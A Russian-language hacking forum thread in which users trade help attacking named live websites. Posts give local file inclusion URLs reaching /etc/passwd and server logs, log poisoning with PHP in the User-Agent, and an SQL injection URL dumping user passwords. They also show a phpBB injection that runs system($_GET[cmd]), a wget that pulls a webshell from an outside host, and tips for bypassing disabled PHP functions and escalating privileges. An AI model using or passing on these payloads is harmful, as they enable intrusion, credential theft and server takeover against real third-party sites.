Помогите пожлауйста найти httpd.conf на этом инклуде http://www.pubertaetverstehen.ch/index.php?pageid=../../../../../../../../../etc/passwd%00
Code: http://www.pubertaetverstehen.ch/index.php?pageid=/var/log/httpd-access.log%00 217.26.52.37 отсюда логирует...
Ещё вопрос. http://www.mfa.gov.et/View_Commentaries/View.php?Page=../../../../../../var/log/httpd-access.log вот лог. Что надо вписаь в инеткряк чтобы оставить запись в этом или еррор логе ================= Вот ещё: http://www.saminfo.ru/~dmitrypg/index.php?pgid=Co&pgextra=../../../../../../../../../../../../var/log/httpd-access.log но мне опять не везёт. php код не выполняется =( вот запись [29/Jun/2009:12:57:15 +0500] "GET / HTTP/1.1" 200 1456 "-" "<? phpinfo(); ?>"
http://www.saminfo.ru/~dmitrypg/index.php?pgid=Co&pgextra=это%20не%20инклуд Warning: fopen(articles/это не инклуд):
PHP: function CheckExt($filename, $ext) { $name = strtolower($filename); if(substr($name, strlen($name) -3, 3) == $ext) return true; else return false; } Этот скрипт уязвим?(он проверяет расш. файла при заливке) Вот что я пытался сделать... Поскоку скрипт проверяет токо название файла (что за расширение стоит в конце) то я попробывал залить gif а в гифе в конце файла (после ";" (без ковычек)) подставить это PHP: <html><script>alert(//)</script></html> Подставил... Зашел через IE(картинка битая была при просмотре), в итоге алерта нету! В чем дело?
Спс, jokester. А есть ли скрипт который сам проверят на дефолтные пути к конфигам и логам? в одной теме где дефолтные пути там есть атач от Elekt. Но архив битый, не открывается. Может гдето ещё есть? ЗЫ можно в дальнеёшем просто joker?
Есть вопрос по Xss уязвимостям: если фильтр фильтрует(ой..) \ заменяя его на html код PHP: \ (c semicolons) так вот... возможно ли как то обойти эту фильтрацию?
Залил вебшелл, но у него права nobody, соответственно сильно не разгуляешься (интересует редактирование файлов). Можно ли как то получить права хотя бы юзверя в папку которого залит шелл, кроме как рутать сервак? Система Freeebsd 6.2.
нужно искать сплоиты, для конкретной версии ядра, в данном случае 6.2, либо попробовать поискать баги в установленной версии веб сервера... например тут: milw0rm.com
Вроде нет сплоита под 6ку, по крайней мере в паблике. Можно поискать сплоиты под сервисы, например sendmail.
там рядом есть инъекция проще Code: http://regina.kz/shop/podrobno.php?CID=999&id=-1+union+select+1,2,username,4,5,6,7,password+from+mos_users+limit+0,1--
Получил я админский акк от булки, залил шелл и мне вылетела не приятная надпись: Warning: shell_exec() has been disabled for security reasons in /faq.php(302) : eval()'d code(2) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code on line 361 Пробовал проинклудить, тож ни чего не получилось, всё отключено, system() тоже... Есть ли в такой ситуации возможность просмотреть конфиг ?
1 залить другой шелл на пхп 2 залить шелл на другом языке, например на перле 3 покурить тему safe_mode bypass. есть даже видео от BlackSun 4 если надо только прочесть файл, то не обязательно иметь полноценный шелл с исполнение команд, можно просто сделать fopen. главное чтобы прав хватило.
phpinfo(); если в нём allow_url_fopen=on, делай copy('http:///ww.site.com/shell.txt','/tmp/shell.php'); потом инклудишь его если off, смотриш на сейф мод, на дизейбл функшнс, там уже по обстоятельствам
Залил шелл через phpbb, с помощью востановления базы....... PHP: UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:system($_GET[cmd])' WHERE user_id=2; Пытаюсь залить madshell в папку /var/www/images/ (права есть)..... делаю так, PHP: http://site.com/forum/profile.php?mode=editprofile&cmd=wget%20http://host.com/papka/shell.php%20-o%20/var/www/images/tyrytrytr.php файл создался, но в ответ при открытие я получаю, Code: --17:50:03-- http://host.com/papka/shell.php => `shell.php' Resolving host.com... xx.xx.xx.xx Connecting to host.com[xx.xx.xx.xx]:80... failed: Connection timed out. ------------------- Почему так???Что такое??